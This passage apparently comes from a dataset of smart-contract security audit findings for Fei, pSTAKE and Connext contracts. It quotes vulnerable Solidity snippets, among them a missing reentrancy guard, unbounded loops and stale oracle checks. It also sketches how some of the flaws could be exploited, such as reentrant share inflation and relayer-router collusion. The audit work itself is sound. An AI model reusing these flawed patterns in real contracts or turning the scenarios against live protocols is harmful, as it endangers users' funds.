It then checks freshness by verifying that the answer is indeed for the last known round. The returned `updatedAt` timestamp is not checked.\\nIf there is a problem with chainlink starting a new round and finding consensus on the new value for the oracle (e.g. chainlink nodes abandon the oracle, chain congestion, vulnerability/attacks on the chainlink system) consumers of this contract may continue using outdated stale data (if oracles are unable to submit no new round is started)\\n```\\n/// @notice read the oracle price\\n/// @return oracle price\\n/// @return true if price is valid\\nfunction read() external view override returns (Decimal.D256 memory, bool) {\\n (uint80 roundId, int256 price,,, uint80 answeredInRound) = chainlinkOracle.latestRoundData();\\n bool valid = !paused() && price > 0 && answeredInRound == roundId;\\n\\n Decimal.D256 memory value = Decimal.from(uint256(price)).div(oracleDecimalsNormalizer);\\n return (value, valid);\\n}\\n```\\n\\n```\\n/// @notice determine if read value is stale\\n/// @return true if read value is stale\\nfunction isOutdated() external view override returns (bool) {\\n (uint80 roundId,,,, uint80 answeredInRound) = chainlinkOracle.latestRoundData();\\n return answeredInRound != roundId;\\n}\\n```\\nчConsider checking the oracle responses `updatedAt` value after calling out to `chainlinkOracle.latestRoundData()` verifying that the result is within an allowed margin of freshness.чч```\\n/// @notice read the oracle price\\n/// @return oracle price\\n/// @return true if price is valid\\nfunction read() external view override returns (Decimal.D256 memory, bool) {\\n (uint80 roundId, int256 price,,, uint80 answeredInRound) = chainlinkOracle.latestRoundData();\\n bool valid = !paused() && price > 0 && answeredInRound == roundId;\\n\\n Decimal.D256 memory value = Decimal.from(uint256(price)).div(oracleDecimalsNormalizer);\\n return (value, valid);\\n}\\n```\\n -CollateralizationOracle - missing events and incomplete event 
informationчlowчThe `CollateralizationOracle.setDepositExclusion` function is used to exclude and re-include deposits from collateralization calculations. Unlike the other state-changing functions in this contract, it doesn't emit an event to inform about the exclusion or re-inclusion.\\n```\\nfunction setDepositExclusion(address \\_deposit, bool \\_excluded) external onlyGuardianOrGovernor {\\n excludedDeposits[\\_deposit] = \\_excluded;\\n}\\n```\\n\\nThe `DepositAdd` event emits not only the deposit address but also the deposit's token. Despite the symmetry, the `DepositRemove` event does not emit the token.\\n```\\nevent DepositAdd(address from, address indexed deposit, address indexed token);\\nevent DepositRemove(address from, address indexed deposit);\\n```\\nч`setDepositExclusion` should emit an event that informs about the deposit and whether it was included or excluded.\\nFor symmetry reasons and because it is indeed useful information, the `DepositRemove` event could include the deposit's token.чч```\\nfunction setDepositExclusion(address \\_deposit, bool \\_excluded) external onlyGuardianOrGovernor {\\n excludedDeposits[\\_deposit] = \\_excluded;\\n}\\n```\\n -RateLimited - Contract starts with a full buffer at deploymentчlowчA contract that inherits from `RateLimited` starts out with a full buffer when it is deployed.\\n```\\n\\_bufferStored = \\_bufferCap;\\n```\\n\\nThat means the full `bufferCap` is immediately available after deployment; it doesn't have to be built up over time. This behavior might be unexpected.чWe recommend starting with an empty buffer, or - if there are valid reasons for the current implementation - at least document it clearly.чч```\\n\\_bufferStored = \\_bufferCap;\\n```\\n -BalancerLBPSwapper - tokenSpent and tokenReceived should be immutableчlowчAcc. 
to the inline comment both `tokenSpent` and `tokenReceived` should be immutable but they are not declared as such.\\n```\\n// tokenSpent and tokenReceived are immutable\\ntokenSpent = \\_tokenSpent;\\ntokenReceived = \\_tokenReceived;\\n```\\n\\n```\\n/// @notice the token to be auctioned\\naddress public override tokenSpent;\\n\\n/// @notice the token to buy\\naddress public override tokenReceived;\\n```\\nчDeclare both variable `immutable`.чч```\\n// tokenSpent and tokenReceived are immutable\\ntokenSpent = \\_tokenSpent;\\ntokenReceived = \\_tokenReceived;\\n```\\n -CollateralizationOracle - potentially unsafe castsчlowч`protocolControlledValue` is the cumulative USD token value of all tokens in the PCV. The USD value is determined using external chainlink oracles. To mitigate some effects of attacks on chainlink to propagate to this protocol it is recommended to implement a defensive approach to handling values derived from the external source. Arithm. overflows are checked by the compiler (0.8.4), however, it does not guarantee safe casting from unsigned to signed integer. 
The scenario of this happening might be rather unlikely, however, there is no guarantee that the external price-feed is not taken over by malicious actors and this is when every line of defense counts.\\n```\\n//solidity 0.8.7\\n » int(uint(2\\*\\*255))\\n-57896044618658097711785492504343953926634992332820282019728792003956564819968\\n » int(uint(2\\*\\*255-2))\\n57896044618658097711785492504343953926634992332820282019728792003956564819966\\n```\\n\\n```\\nprotocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n```\\n\\n```\\nprotocolControlledValue += \\_oraclePrice.mul(\\_totalTokenBalance).asUint256();\\n```\\nчPerform overflow checked SafeCast as another line of defense against oracle manipulation.чч```\\n//solidity 0.8.7\\n » int(uint(2\\*\\*255))\\n-57896044618658097711785492504343953926634992332820282019728792003956564819968\\n » int(uint(2\\*\\*255-2))\\n57896044618658097711785492504343953926634992332820282019728792003956564819966\\n```\\n -FeiTimedMinter - constructor does not enforce the same boundaries as setter for frequencyчlowчThe setter method for `frequency` enforced upper and lower bounds while the constructor does not. 
Users cannot trust that the `frequency` is actually set to be within bounds on deployment.\\n```\\nconstructor(\\n address \\_core,\\n address \\_target,\\n uint256 \\_incentive,\\n uint256 \\_frequency,\\n uint256 \\_initialMintAmount\\n)\\n CoreRef(\\_core)\\n Timed(\\_frequency)\\n Incentivized(\\_incentive)\\n RateLimitedMinter((\\_initialMintAmount + \\_incentive) / \\_frequency, (\\_initialMintAmount + \\_incentive), true)\\n{\\n \\_initTimed();\\n\\n \\_setTarget(\\_target);\\n \\_setMintAmount(\\_initialMintAmount);\\n}\\n```\\n\\n```\\nfunction setFrequency(uint256 newFrequency) external override onlyGovernorOrAdmin {\\n require(newFrequency >= MIN\\_MINT\\_FREQUENCY, \"FeiTimedMinter: frequency low\");\\n require(newFrequency <= MAX\\_MINT\\_FREQUENCY, \"FeiTimedMinter: frequency high\");\\n\\n \\_setDuration(newFrequency);\\n}\\n```\\nчPerform the same checks on `frequency` in the constructor as in the `setFrequency` method.\\nThis contract is also inherited by a range of contracts that might specify different boundaries to what is hardcoded in the `FeiTimedMinter`. 
A way to enforce bounds-checks could be to allow overriding the setter method and using the setter in the constructor as well ensuring that bounds are also checked on deployment.чч```\\nconstructor(\\n address \\_core,\\n address \\_target,\\n uint256 \\_incentive,\\n uint256 \\_frequency,\\n uint256 \\_initialMintAmount\\n)\\n CoreRef(\\_core)\\n Timed(\\_frequency)\\n Incentivized(\\_incentive)\\n RateLimitedMinter((\\_initialMintAmount + \\_incentive) / \\_frequency, (\\_initialMintAmount + \\_incentive), true)\\n{\\n \\_initTimed();\\n\\n \\_setTarget(\\_target);\\n \\_setMintAmount(\\_initialMintAmount);\\n}\\n```\\n -CollateralizationOracle - swapDeposit should call internal functions to remove/add depositsчlowчInstead of calling `removeDeposit` and `addDeposit`, `swapDeposit` should call its internal sister functions `_removeDeposit` and `_addDeposit` to avoid running the `onlyGovernor` checks multiple times.\\n```\\n/// @notice Swap a PCVDeposit with a new one, for instance when a new version\\n/// of a deposit (holding the same token) is deployed.\\n/// @param \\_oldDeposit : the PCVDeposit to remove from the list.\\n/// @param \\_newDeposit : the PCVDeposit to add to the list.\\nfunction swapDeposit(address \\_oldDeposit, address \\_newDeposit) external onlyGovernor {\\n removeDeposit(\\_oldDeposit);\\n addDeposit(\\_newDeposit);\\n}\\n```\\nчCall the internal functions instead. 
addDeposit's and removeDeposit's visibility can then be changed from `public` to `external`.чч```\\n/// @notice Swap a PCVDeposit with a new one, for instance when a new version\\n/// of a deposit (holding the same token) is deployed.\\n/// @param \\_oldDeposit : the PCVDeposit to remove from the list.\\n/// @param \\_newDeposit : the PCVDeposit to add to the list.\\nfunction swapDeposit(address \\_oldDeposit, address \\_newDeposit) external onlyGovernor {\\n removeDeposit(\\_oldDeposit);\\n addDeposit(\\_newDeposit);\\n}\\n```\\n -CollateralizationOracle - misleading commentsчlowчAccording to an inline comment in `isOvercollateralized`, the validity status of `pcvStats` is ignored, while it is actually being checked.\\nSimilarly, a comment in `pcvStats` mentions that the returned `protocolEquity` is 0 if there is less PCV than circulating FEI, while in reality, `pcvStats` always returns the difference between the former and the latter, even if it is negative.\\n```\\n/// Controlled Value) than the circulating (user-owned) FEI, i.e.\\n/// a positive Protocol Equity.\\n/// Note: the validity status is ignored in this function.\\nfunction isOvercollateralized() external override view whenNotPaused returns (bool) {\\n (,, int256 \\_protocolEquity, bool \\_valid) = pcvStats();\\n require(\\_valid, \"CollateralizationOracle: reading is invalid\");\\n return \\_protocolEquity > 0;\\n}\\n```\\n\\n```\\n/// @return protocolEquity : the difference between PCV and user circulating FEI.\\n/// If there are more circulating FEI than $ in the PCV, equity is 0.\\n```\\n\\n```\\nprotocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n```\\nчRevise the comments.чч```\\n/// Controlled Value) than the circulating (user-owned) FEI, i.e.\\n/// a positive Protocol Equity.\\n/// Note: the validity status is ignored in this function.\\nfunction isOvercollateralized() external override view whenNotPaused returns (bool) {\\n (,, int256 \\_protocolEquity, bool 
\\_valid) = pcvStats();\\n require(\\_valid, \"CollateralizationOracle: reading is invalid\");\\n return \\_protocolEquity > 0;\\n}\\n```\\n -The withdrawUnstakedTokens may run out of gasчhighчThe `withdrawUnstakedTokens` is iterating over all batches of unstaked tokens. One user, if unstaked many times, could get their tokens stuck in the contract.\\n```\\nfunction withdrawUnstakedTokens(address staker)\\n public\\n virtual\\n override\\n whenNotPaused\\n{\\n require(staker == \\_msgSender(), \"LQ20\");\\n uint256 \\_withdrawBalance;\\n uint256 \\_unstakingExpirationLength = \\_unstakingExpiration[staker]\\n .length;\\n uint256 \\_counter = \\_withdrawCounters[staker];\\n for (\\n uint256 i = \\_counter;\\n i < \\_unstakingExpirationLength;\\n i = i.add(1)\\n ) {\\n //get getUnstakeTime and compare it with current timestamp to check if 21 days + epoch difference has passed\\n (uint256 \\_getUnstakeTime, , ) = getUnstakeTime(\\n \\_unstakingExpiration[staker][i]\\n );\\n if (block.timestamp >= \\_getUnstakeTime) {\\n //if 21 days + epoch difference has passed, then add the balance and then mint uTokens\\n \\_withdrawBalance = \\_withdrawBalance.add(\\n \\_unstakingAmount[staker][i]\\n );\\n \\_unstakingExpiration[staker][i] = 0;\\n \\_unstakingAmount[staker][i] = 0;\\n \\_withdrawCounters[staker] = \\_withdrawCounters[staker].add(1);\\n }\\n }\\n\\n require(\\_withdrawBalance > 0, \"LQ21\");\\n emit WithdrawUnstakeTokens(staker, \\_withdrawBalance, block.timestamp);\\n \\_uTokens.mint(staker, \\_withdrawBalance);\\n}\\n```\\nчResolution\\nComment from pSTAKE Finance team:\\nHave implemented a batchingLimit variable which enforces a definite number of iterations during withdrawal of unstaked tokens, instead of indefinite iterations.\\nLimit the number of processed unstaked batches, and possibly add pagination.чч```\\nfunction withdrawUnstakedTokens(address staker)\\n public\\n virtual\\n override\\n whenNotPaused\\n{\\n require(staker == \\_msgSender(), 
\"LQ20\");\\n uint256 \\_withdrawBalance;\\n uint256 \\_unstakingExpirationLength = \\_unstakingExpiration[staker]\\n .length;\\n uint256 \\_counter = \\_withdrawCounters[staker];\\n for (\\n uint256 i = \\_counter;\\n i < \\_unstakingExpirationLength;\\n i = i.add(1)\\n ) {\\n //get getUnstakeTime and compare it with current timestamp to check if 21 days + epoch difference has passed\\n (uint256 \\_getUnstakeTime, , ) = getUnstakeTime(\\n \\_unstakingExpiration[staker][i]\\n );\\n if (block.timestamp >= \\_getUnstakeTime) {\\n //if 21 days + epoch difference has passed, then add the balance and then mint uTokens\\n \\_withdrawBalance = \\_withdrawBalance.add(\\n \\_unstakingAmount[staker][i]\\n );\\n \\_unstakingExpiration[staker][i] = 0;\\n \\_unstakingAmount[staker][i] = 0;\\n \\_withdrawCounters[staker] = \\_withdrawCounters[staker].add(1);\\n }\\n }\\n\\n require(\\_withdrawBalance > 0, \"LQ21\");\\n emit WithdrawUnstakeTokens(staker, \\_withdrawBalance, block.timestamp);\\n \\_uTokens.mint(staker, \\_withdrawBalance);\\n}\\n```\\n -The _calculatePendingRewards can run out of gasчmediumчThe reward rate in STokens can be changed, and the history of these changes are stored in the contract:\\n```\\nfunction setRewardRate(uint256 rewardRate)\\n public\\n virtual\\n override\\n returns (bool success)\\n{\\n // range checks for rewardRate. Since rewardRate cannot be more than 100%, the max cap\\n // is \\_valueDivisor \\* 100, which then brings the fees to 100 (percentage)\\n require(rewardRate <= \\_valueDivisor.mul(100), \"ST17\");\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"ST2\");\\n \\_rewardRate.push(rewardRate);\\n \\_lastMovingRewardTimestamp.push(block.timestamp);\\n emit SetRewardRate(rewardRate);\\n\\n return true;\\n}\\n```\\n\\nWhen the reward is calculated `for` each user, all changes of the `_rewardRate` are considered. So there is a `for` loop that iterates over all changes since the last reward update. 
If the reward rate was changed many times, the `_calculatePendingRewards` function could run out of gas.чProvide an option to partially update the reward, so the full update can be split in multiple transactions.чч```\\nfunction setRewardRate(uint256 rewardRate)\\n public\\n virtual\\n override\\n returns (bool success)\\n{\\n // range checks for rewardRate. Since rewardRate cannot be more than 100%, the max cap\\n // is \\_valueDivisor \\* 100, which then brings the fees to 100 (percentage)\\n require(rewardRate <= \\_valueDivisor.mul(100), \"ST17\");\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"ST2\");\\n \\_rewardRate.push(rewardRate);\\n \\_lastMovingRewardTimestamp.push(block.timestamp);\\n emit SetRewardRate(rewardRate);\\n\\n return true;\\n}\\n```\\n -The calculateRewards should not be callable by the whitelisted contractчmediumчThe `calculateRewards` function should only be called for non-whitelisted addresses:\\n```\\nfunction calculateRewards(address to)\\n public\\n virtual\\n override\\n whenNotPaused\\n returns (bool success)\\n{\\n require(to == \\_msgSender(), \"ST5\");\\n uint256 reward = \\_calculateRewards(to);\\n emit TriggeredCalculateRewards(to, reward, block.timestamp);\\n return true;\\n}\\n```\\n\\nFor all the whitelisted addresses, the `calculateHolderRewards` function is called. 
But if the `calculateRewards` function is called by the whitelisted address directly, the function will execute, and the rewards will be distributed to the caller instead of the intended recipients.чResolution\\nComment from pSTAKE Finance team:\\nHave created a require condition in Smart Contract code to disallow whitelisted contracts from calling the function\\nWhile this scenario is unlikely to happen, adding the additional check in the `calculateRewards` is a good option.чч```\\nfunction calculateRewards(address to)\\n public\\n virtual\\n override\\n whenNotPaused\\n returns (bool success)\\n{\\n require(to == \\_msgSender(), \"ST5\");\\n uint256 reward = \\_calculateRewards(to);\\n emit TriggeredCalculateRewards(to, reward, block.timestamp);\\n return true;\\n}\\n```\\n -Presence of testnet codeчmediumчBased on the discussions with pStake team and in-line comments, there are a few instances of code and commented code in the code base under audit that are not finalized for mainnet deployment.\\n```\\nfunction initialize(address pauserAddress) public virtual initializer {\\n \\_\\_ERC20\\_init(\"pSTAKE Token\", \"PSTAKE\");\\n \\_\\_AccessControl\\_init();\\n \\_\\_Pausable\\_init();\\n \\_setupRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender());\\n \\_setupRole(PAUSER\\_ROLE, pauserAddress);\\n // PSTAKE IS A SIMPLE ERC20 TOKEN HENCE 18 DECIMAL PLACES\\n \\_setupDecimals(18);\\n // pre-allocate some tokens to an admin address which will air drop PSTAKE tokens\\n // to each of holder contracts. This is only for testnet purpose. 
in Mainnet, we\\n // will use a vesting contract to allocate tokens to admin in a certain schedule\\n \\_mint(\\_msgSender(), 5000000000000000000000000);\\n}\\n```\\n\\nThe initialize function currently mints all the tokens to msg.sender, however the goal for mainnet is to use a vesting contract which is not present in the current code.чIt is recommended to fully test the final code before deployment to the mainnet.чч```\\nfunction initialize(address pauserAddress) public virtual initializer {\\n \\_\\_ERC20\\_init(\"pSTAKE Token\", \"PSTAKE\");\\n \\_\\_AccessControl\\_init();\\n \\_\\_Pausable\\_init();\\n \\_setupRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender());\\n \\_setupRole(PAUSER\\_ROLE, pauserAddress);\\n // PSTAKE IS A SIMPLE ERC20 TOKEN HENCE 18 DECIMAL PLACES\\n \\_setupDecimals(18);\\n // pre-allocate some tokens to an admin address which will air drop PSTAKE tokens\\n // to each of holder contracts. This is only for testnet purpose. in Mainnet, we\\n // will use a vesting contract to allocate tokens to admin in a certain schedule\\n \\_mint(\\_msgSender(), 5000000000000000000000000);\\n}\\n```\\n -Sanity check on all important variablesчlowчMost of the functionalities have proper sanity checks when it comes to setting system-wide variables, such as whitelist addresses. 
However there are a few key setters that lack such sanity checks.\\nSanity check (!= address(0)) on all token contracts.\\n```\\nfunction setUTokensContract(address uAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LP9\");\\n \\_uTokens = IUTokens(uAddress);\\n emit SetUTokensContract(uAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param sAddress: stoken contract address\\n \\*\\n \\* Emits a {SetSTokensContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setSTokensContract(address sAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LP10\");\\n \\_sTokens = ISTokens(sAddress);\\n emit SetSTokensContract(sAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param pstakeAddress: pStake contract address\\n \\*\\n \\* Emits a {SetPSTAKEContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setPSTAKEContract(address pstakeAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LP11\");\\n \\_pstakeTokens = IPSTAKE(pstakeAddress);\\n emit SetPSTAKEContract(pstakeAddress);\\n}\\n```\\n\\nSanity check on `unstakingLockTime` to be in the acceptable range (21 hours to 21 days)\\n```\\n/\\*\\*\\n \\* @dev Set 'unstake props', called from admin\\n \\* @param unstakingLockTime: varies from 21 hours to 21 days\\n \\*\\n \\* Emits a {SetUnstakeProps} event with 'fee' set to the stake and unstake.\\n \\*\\n \\*/\\nfunction setUnstakingLockTime(uint256 unstakingLockTime)\\n public\\n virtual\\n returns (bool success)\\n{\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LQ3\");\\n \\_unstakingLockTime = unstakingLockTime;\\n emit SetUnstakingLockTime(unstakingLockTime);\\n return true;\\n}\\n```\\nчResolution\\nComment from pSTAKE Finance team:\\nPost the 
implementation of new emission logic there have been a rearrangement of some variables, but the rest have been sanity tested and correctedчч```\\nfunction setUTokensContract(address uAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LP9\");\\n \\_uTokens = IUTokens(uAddress);\\n emit SetUTokensContract(uAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param sAddress: stoken contract address\\n \\*\\n \\* Emits a {SetSTokensContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setSTokensContract(address sAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LP10\");\\n \\_sTokens = ISTokens(sAddress);\\n emit SetSTokensContract(sAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param pstakeAddress: pStake contract address\\n \\*\\n \\* Emits a {SetPSTAKEContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setPSTAKEContract(address pstakeAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), \"LP11\");\\n \\_pstakeTokens = IPSTAKE(pstakeAddress);\\n emit SetPSTAKEContract(pstakeAddress);\\n}\\n```\\n -TransactionManager - Receiver-side check also on sending side FixчhighчThe functions `prepare`, `cancel`, and `fulfill` in the `TransactionManager` all have a “common part” that is executed on both the sending and the receiving chain and side-specific parts that are only executed either on the sending or on the receiving side.\\nThe following lines occur in fulfill's common part, but this should only be checked on the receiving chain. In fact, on the sending chain, we might even compare amounts of different assets.\\n```\\n// Sanity check: fee <= amount. 
Allow `=` in case of only wanting to execute\\n// 0-value crosschain tx, so only providing the fee amount\\nrequire(relayerFee <= txData.amount, \"#F:023\");\\n```\\n\\nThis could prevent a legitimate `fulfill` on the sending chain, causing a loss of funds for the router.чResolution\\nThe Connext team claims to have fixed this in commit `4adbfd52703441ee5de655130fc2e0252eae4661`. We have not reviewed this commit or, generally, the codebase at this point.\\nMove these lines to the receiving-side part.\\nRemark\\nThe `callData` supplied to `fulfill` is not used at all on the sending chain, but the check whether its hash matches `txData.callDataHash` happens in the common part.\\n```\\n// Check provided callData matches stored hash\\nrequire(keccak256(callData) == txData.callDataHash, \"#F:024\");\\n```\\n\\nIn principle, this check could also be moved to the receiving-chain part, allowing the router to save some gas by calling sending-side `fulfill` with empty `callData` and skip the check. Note, however, that the `TransactionFulfilled` event will then also emit the “wrong” `callData` on the sending chain, so the off-chain code has to be able to deal with that if you want to employ this optimization.чч```\\n// Sanity check: fee <= amount. 
Allow `=` in case of only wanting to execute\\n// 0-value crosschain tx, so only providing the fee amount\\nrequire(relayerFee <= txData.amount, \"#F:023\");\\n```\\n -TransactionManager - Missing nonReentrant modifier on removeLiquidityчmediumчResolution\\nThis issue has been fixed.\\nThe `removeLiquidity` function does not have a `nonReentrant` modifier.\\n```\\n/\\*\\*\\n \\* @notice This is used by any router to decrease their available\\n \\* liquidity for a given asset.\\n \\* @param shares The amount of liquidity to remove for the router in shares\\n \\* @param assetId The address (or `address(0)` if native asset) of the\\n \\* asset you're removing liquidity for\\n \\* @param recipient The address that will receive the liquidity being removed\\n \\*/\\nfunction removeLiquidity(\\n uint256 shares,\\n address assetId,\\n address payable recipient\\n) external override {\\n // Sanity check: recipient is sensible\\n require(recipient != address(0), \"#RL:007\");\\n\\n // Sanity check: nonzero shares\\n require(shares > 0, \"#RL:035\");\\n\\n // Get stored router shares\\n uint256 routerShares = issuedShares[msg.sender][assetId];\\n\\n // Get stored outstanding shares\\n uint256 outstanding = outstandingShares[assetId];\\n\\n // Sanity check: owns enough shares\\n require(routerShares >= shares, \"#RL:018\");\\n\\n // Convert shares to amount\\n uint256 amount = getAmountFromIssuedShares(\\n shares,\\n outstanding,\\n Asset.getOwnBalance(assetId)\\n );\\n\\n // Update router issued shares\\n // NOTE: unchecked due to require above\\n unchecked {\\n issuedShares[msg.sender][assetId] = routerShares - shares;\\n }\\n\\n // Update the total shares for asset\\n outstandingShares[assetId] = outstanding - shares;\\n\\n // Transfer from contract to specified recipient\\n Asset.transferAsset(assetId, recipient, amount);\\n\\n // Emit event\\n emit LiquidityRemoved(\\n msg.sender,\\n assetId,\\n shares,\\n amount,\\n recipient\\n );\\n}\\n```\\n\\nAssuming we're dealing 
with a token contract that allows execution of third-party-supplied code, that means it is possible to leave the `TransactionManager` contract in one of the functions that call into the token contract and then reenter via `removeLiquidity`. Alternatively, we can leave the contract in `removeLiquidity` and reenter through an arbitrary external function, even if it has a `nonReentrant` modifier.\\nExample\\nAssume a token contract allows the execution of third-party-supplied code in its `transfer` function before the actual balance change takes place. If a router calls `removeLiquidity` with half of their shares and then, in a reentering `removeLiquidity` call, supplies the other half of their shares, they will receive more tokens than if they had liquidated all their shares at once because the reentering call occurs after the (first half of the) shares have been burnt but before the corresponding amount of tokens has actually been transferred out of the contract, leading to an artificially increased share value in the reentering call. Similarly, reentering the contract with a `fulfill` call on the receiving chain instead of a second `removeLiquidity` would `transfer` too many tokens to the recipient due to the artificially inflated share value.чWhile tokens that behave as described in the example might be rare or not exist at all, caution is advised when integrating with unknown tokens or calling untrusted code in general. 
We strongly recommend adding a `nonReentrant` modifier to `removeLiquidity`.чч```\\n/\\*\\*\\n \\* @notice This is used by any router to decrease their available\\n \\* liquidity for a given asset.\\n \\* @param shares The amount of liquidity to remove for the router in shares\\n \\* @param assetId The address (or `address(0)` if native asset) of the\\n \\* asset you're removing liquidity for\\n \\* @param recipient The address that will receive the liquidity being removed\\n \\*/\\nfunction removeLiquidity(\\n uint256 shares,\\n address assetId,\\n address payable recipient\\n) external override {\\n // Sanity check: recipient is sensible\\n require(recipient != address(0), \"#RL:007\");\\n\\n // Sanity check: nonzero shares\\n require(shares > 0, \"#RL:035\");\\n\\n // Get stored router shares\\n uint256 routerShares = issuedShares[msg.sender][assetId];\\n\\n // Get stored outstanding shares\\n uint256 outstanding = outstandingShares[assetId];\\n\\n // Sanity check: owns enough shares\\n require(routerShares >= shares, \"#RL:018\");\\n\\n // Convert shares to amount\\n uint256 amount = getAmountFromIssuedShares(\\n shares,\\n outstanding,\\n Asset.getOwnBalance(assetId)\\n );\\n\\n // Update router issued shares\\n // NOTE: unchecked due to require above\\n unchecked {\\n issuedShares[msg.sender][assetId] = routerShares - shares;\\n }\\n\\n // Update the total shares for asset\\n outstandingShares[assetId] = outstanding - shares;\\n\\n // Transfer from contract to specified recipient\\n Asset.transferAsset(assetId, recipient, amount);\\n\\n // Emit event\\n emit LiquidityRemoved(\\n msg.sender,\\n assetId,\\n shares,\\n amount,\\n recipient\\n );\\n}\\n```\\n -TransactionManager - Relayer may use user's cancel after expiry signature to steal user's funds by colluding with a router AcknowledgedчmediumчUsers that are willing to have a lower trust dependency on a relayer should have the ability to opt-in only for the service that allows the relayer to withdraw back 
users' funds from the sending chain after expiry. However, in practice, a user is forced to opt-in for the service that refunds the router before the expiry, since the same signature is used for both services (lines 795,817 use the same signature).\\nLet's consider the case of a user willing to call `fulfill` on his own, but to use the relayer only to withdraw back his funds from the sending chain after expiry. In this case, the relayer can collude with the router and use the user's `cancel` signature (meant for withdrawing his only after expiry) as a front-running transaction for a user call to `fulfill`. This way the router will be able to withdraw both his funds and the user's funds since the user's `fulfill` signature is now public data residing in the mem-pool.\\n```\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, \"cancel\", signature) == txData.user, \"#C:022\");\\n\\n Asset.transferAsset(txData.sendingAssetId, payable(msg.sender), relayerFee);\\n }\\n\\n // Get the amount to refund the user\\n uint256 toRefund;\\n unchecked {\\n toRefund = amount - relayerFee;\\n }\\n\\n // Return locked funds to sending chain fallback\\n if (toRefund > 0) {\\n Asset.transferAsset(txData.sendingAssetId, payable(txData.sendingChainFallback), toRefund);\\n }\\n }\\n\\n} else {\\n // Receiver side, router liquidity is returned\\n if (txData.expiry >= block.timestamp) {\\n // Timeout has not expired and tx may only be cancelled by user\\n // Validate signature\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, \"cancel\", signature) == txData.user, \"#C:022\");\\n```\\nчThe crucial point here is that the user must never sign a “cancel” that could be used on the receiving chain while fulfillment on the sending chain is still a possibility.\\nOr, to put it differently: A user may only sign a “cancel” that is valid on the receiving chain after sending-chain expiry or if they never have and won't 
ever sign a “fulfill” (or at least won't sign until sending-chain expiry — but it is pointless to sign a “fulfill” after that, so “never” is a reasonable simplification).\\nOr, finally, a more symmetric perspective on this requirement: If a user has signed “fulfill”, they must not sign a receiving-chain-valid “cancel” until sending-chain expiry, and if they have signed a receiving-chain-valid “cancel”, they must not sign a “fulfill” (until sending-chain expiry).\\nIn this sense, “cancel” signatures that are valid on the receiving chain are dangerous, while sending-side cancellations are not. So the principle stated in the previous paragraph might be easier to follow with different signatures for sending- and receiving-chain cancellations.чч```\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, \"cancel\", signature) == txData.user, \"#C:022\");\\n\\n Asset.transferAsset(txData.sendingAssetId, payable(msg.sender), relayerFee);\\n }\\n\\n // Get the amount to refund the user\\n uint256 toRefund;\\n unchecked {\\n toRefund = amount - relayerFee;\\n }\\n\\n // Return locked funds to sending chain fallback\\n if (toRefund > 0) {\\n Asset.transferAsset(txData.sendingAssetId, payable(txData.sendingChainFallback), toRefund);\\n }\\n }\\n\\n} else {\\n // Receiver side, router liquidity is returned\\n if (txData.expiry >= block.timestamp) {\\n // Timeout has not expired and tx may only be cancelled by user\\n // Validate signature\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, \"cancel\", signature) == txData.user, \"#C:022\");\\n```\\n -ProposedOwnable - two-step ownership transfer should be confirmed by the new ownerчmediumчIn order to avoid losing control of the contract, the two-step ownership transfer should be confirmed by the new owner's address instead of the current owner.\\n`acceptProposedOwner` is restricted to `onlyOwner` while ownership should be accepted by the 
newOwner\\n```\\n/\\*\\*\\n \\* @notice Transfers ownership of the contract to a new account (`newOwner`).\\n \\* Can only be called by the current owner.\\n \\*/\\nfunction acceptProposedOwner() public virtual onlyOwner {\\n require((block.timestamp - \\_proposedTimestamp) > \\_delay, \"#APO:030\");\\n \\_setOwner(\\_proposed);\\n}\\n```\\n\\nmove `renounced()` to `ProposedOwnable` as this is where it logically belongs to\\n```\\nfunction renounced() public view override returns (bool) {\\n return owner() == address(0);\\n}\\n```\\n\\n`onlyOwner` can directly access state-var `_owner` instead of spending more gas on calling `owner()`\\n```\\nmodifier onlyOwner() {\\n require(owner() == msg.sender, \"#OO:029\");\\n \\_;\\n}\\n```\\nчResolution\\nAll recommendations given below have been implemented. In addition to that, the privilege to manage assets and the privilege to manage routers can now be renounced separately.\\n`onlyOwner` can directly access `_owner` (gas optimization)\\nadd a method to explicitly renounce ownership of the contract\\nmove `TransactionManager.renounced()` to `ProposedOwnable` as this is where it logically belongs to\\nchange the access control for `acceptProposedOwner` from `onlyOwner` to `require(msg.sender == _proposed)` (new owner).чч```\\n/\\*\\*\\n \\* @notice Transfers ownership of the contract to a new account (`newOwner`).\\n \\* Can only be called by the current owner.\\n \\*/\\nfunction acceptProposedOwner() public virtual onlyOwner {\\n require((block.timestamp - \\_proposedTimestamp) > \\_delay, \"#APO:030\");\\n \\_setOwner(\\_proposed);\\n}\\n```\\n -FulfillInterpreter - Wrong order of actions in 